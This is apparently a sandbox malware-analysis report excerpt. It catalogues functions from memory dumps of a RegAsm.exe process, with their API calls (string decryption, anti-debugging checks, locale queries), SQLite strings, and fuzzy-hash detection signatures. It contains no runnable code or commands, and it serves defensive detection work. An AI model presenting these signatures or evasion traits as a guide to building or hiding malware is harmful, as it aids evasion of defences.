Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: 8*d
API String ID: 2579439406-4035773523
Opcode ID: 5ed00ec2be3fa8c0a18033fda77e17b8655e54708fff43b7fca3586c98a20a9d
Instruction ID: ba808b284e536fa33b035d48e41bedda3b5bfac0dfc64b2c7f60dbe603414694
Opcode Fuzzy Hash: 5ed00ec2be3fa8c0a18033fda77e17b8655e54708fff43b7fca3586c98a20a9d
Instruction Fuzzy Hash: 4521C0BC9003069FC721DF65ECA96847BB2FB0A318FA0242AF90887670E77455C18F59

Uniqueness

Uniqueness Score: -1.00%

Function 19A74820 Relevance: 9.3, APIs: 6, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732bc89ecc38bda5bcd734ff4af53d4ab3ade3c695577bfd19a03097e0372093
Instruction ID: a37ba4744af271f030b4477592d174d1610748b9a70a482a779e13edd7b2509f
Opcode Fuzzy Hash: 732bc89ecc38bda5bcd734ff4af53d4ab3ade3c695577bfd19a03097e0372093
Instruction Fuzzy Hash: 20B1C0B4804746AFD304CF25C885B1BB7F9BF85B04F089A59F89597280E375E958CF92

Uniqueness

Uniqueness Score: -1.00%

Function 19A75C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction ID: 5b4300ebd205a7a22791d86bef56f2d305a6d204146c9c791c2a10358f70bf1b
Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction Fuzzy Hash: B84103B52143819FEB08DF14C885B67B7E8FF88711F185469E8818B6A1E762F858CB60

Uniqueness

Uniqueness Score: -1.00%

Function 19AF9090 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51af67a26333fb25559abd1630bcf4f66ecf2b1f4005bdec5b8a2d7ce9647a12
Instruction ID: 293540d96f857443de214a1171695c760513a7ac6efa5f426537a8767b12dfa7
Opcode Fuzzy Hash: 51af67a26333fb25559abd1630bcf4f66ecf2b1f4005bdec5b8a2d7ce9647a12
Instruction Fuzzy Hash: 5031E0356002009FD350CF28D985E6AB3F9FF80725B0885B9E9428B2A2D722FC59CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409330 Relevance: 9.1, APIs: 6, Instructions: 98stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409359
lstrlen.KERNEL32(004096B6,00000001,?,00001FA0,00000000,00000000,?,004096B6), ref: 00409376
CryptStringToBinaryA.CRYPT32(004096B6,00000000,?,004096B6), ref: 0040937E
memcpy.MSVCRT ref: 004093F1
lstrcat.KERNEL32(00427AA7,00427AAB), ref: 0040942D
lstrcat.KERNEL32(00427AA7,00427AAE), ref: 0040944F

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 2615ec560cdb2c1a10ecaa05070d148f4a90f8d52c94285c4d2187c6f722cb7f
Instruction ID: adffa3e7da8eb43a5bcae6fb888e125dec844c82986ee0a6d8cae4d8ea5a37e5
Opcode Fuzzy Hash: 2615ec560cdb2c1a10ecaa05070d148f4a90f8d52c94285c4d2187c6f722cb7f
Instruction Fuzzy Hash: 8131F575B04219ABCB00DB84EC46BEF7779EF85715F14407AFA08A6280D7745A048BEA

Uniqueness

Uniqueness Score: -1.00%

Function 19AE1FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 19AE2001

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-914542581
Opcode ID: 2ebe36193a7ceedecf2c7030db0f980541cfc5e87981a82751c4672d45ad6930
Instruction ID: 38ed9d3e1ea12e46629825ec5075e486b2a68997cae7be34aa3458b26dd65b24
Opcode Fuzzy Hash: 2ebe36193a7ceedecf2c7030db0f980541cfc5e87981a82751c4672d45ad6930
Instruction Fuzzy Hash: A721F375500209AFD710AF68DC80F56BBAEFF44B54F089458F884971A1E772FC68CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 19C53300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,19C53688,?,00000000), ref: 19C53399
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,19C53688,?,00000000), ref: 19C533C2
GetACP.KERNEL32(?,?,19C53688,?,00000000), ref: 19C533D7

Strings

OCP, xrefs: 19C53354
ACP, xrefs: 19C5331E

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 1ac3afcf59c103b0328030eefb43f4949d485ec7bf8d1ae0d23ed34966457dd2
Instruction ID: a509d34c1b185f640b2a9747a78ae8f5ad13cddb95894fcc5e67660f111d6dab
Opcode Fuzzy Hash: 1ac3afcf59c103b0328030eefb43f4949d485ec7bf8d1ae0d23ed34966457dd2
Instruction Fuzzy Hash: 1B21B033700147E6F7118F55E905A8B73A6AF58F90F4A8464E9CBDB144EF32DA02C398

Uniqueness

Uniqueness Score: -1.00%

Function 19A63AA3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 19C5365A
IsValidCodePage.KERNEL32(00000000), ref: 19C53698
IsValidLocale.KERNEL32(?,00000001), ref: 19C536AB
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 19C536F3
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 19C5370E

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: bddcc1a3eb3fe6e331eb0b025d83c1d52f83e778881f2da6a24e94a19a972110
Instruction ID: 62feafc4446e2cddfe2680118ed1f3ebadca34b18b00be40366002ed59f714df
Opcode Fuzzy Hash: bddcc1a3eb3fe6e331eb0b025d83c1d52f83e778881f2da6a24e94a19a972110
Instruction Fuzzy Hash: E051C3B2B00209EBFB00DFA5EC80AAE73B8FF04740F594469E586DB290EB709544CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004117A0 Relevance: 6.1, APIs: 4, Instructions: 63memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
HeapAlloc.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
Instruction ID: 21c28c5b9c274bc113086ca6f345efa6a7341173b31fdfb7d0b317eddc9c08d9
Opcode Fuzzy Hash: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
Instruction Fuzzy Hash: 3F111275200209ABDB10DFA5EC85EEB77EDEF4A351F10455AFD18D7340D7719C518AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00406F10 Relevance: 6.1, APIs: 4, Instructions: 54encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 0cf6c307582c09c58365ce669227be7a52b012e3e5f8b937cc83d1a50c8f3791
Instruction ID: c5d6de6eb5c64771bd9390db4b19ad01a52cb4a27094bb8536fc16c2df0bce05
Opcode Fuzzy Hash: 0cf6c307582c09c58365ce669227be7a52b012e3e5f8b937cc83d1a50c8f3791
Instruction Fuzzy Hash: CF014F76340312BBE7204FA5AC55F56B7ACEF05B61F200022FB09EB2C0D7B5A8108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 19B437E0 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction ID: 4ff37b15d8f7bf72896c5bf0751da85d99cafcbbeaf1eebf95d1def6275b17db
Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction Fuzzy Hash: 4BE0B63A004780ABCB225F51DE45E4BBFB6BF48714F089C18F59561470C7B2B8A9AB41

Uniqueness

Uniqueness Score: -1.00%

Function 19B23770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction ID: d9eeea9828b069ab72135018a9ba9ae3368a34fe6f58c35b5423ae3c01e347b3
Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction Fuzzy Hash: C2E0B63A004700ABCB225F50DE46E4BBFB6BF48B10F089C18F5D521670C772B868AB41

Uniqueness

Uniqueness Score: -1.00%

Function 19B05910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 19B0597E

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
API String ID: 0-143322027
Opcode ID: c5b011a5428526c28d4ddf527bb374bceb65564be520d4ecd44ffac6fee11fb9
Instruction ID: 938517b20c469fe3eb386ed1d2f696a5b1fb744c8e7d30b84362e4d7919a3e02
Opcode Fuzzy Hash: c5b011a5428526c28d4ddf527bb374bceb65564be520d4ecd44ffac6fee11fb9
Instruction Fuzzy Hash: D211AFB6500205BFD7109F55CC84F86BBBDFF49714F089044F90897291C7B2B4A4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 19B1D3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825efe82271df108eabaf5e5d476829249ce7dd84f31e3025fc6ac2982b3bb5d
Instruction ID: d41008f365a33f65111ba20ce951ec09f4221f6eb2b7f3c2179cefa7d9049c12
Opcode Fuzzy Hash: 825efe82271df108eabaf5e5d476829249ce7dd84f31e3025fc6ac2982b3bb5d
Instruction Fuzzy Hash: 79315CB5600615ABE700EF69EC81A66B3EDFF88214F088578F948C7281E771F910CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 19B055B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d08be9a7fd422e373b6ee6fd7dfd4618cef03bdb9163aeab958d7b5dc40f07
Instruction ID: f6fdabcac4503977ef54d918de43c72996ccc8f23cd69d888e99459fa2231fe6
Opcode Fuzzy Hash: 90d08be9a7fd422e373b6ee6fd7dfd4618cef03bdb9163aeab958d7b5dc40f07
Instruction Fuzzy Hash: EB317AB5500305AFEB108F26DC94B1B7BFDEF84314F189868F8858B6A1E7B1E954CB61

Uniqueness

Uniqueness Score: -1.00%

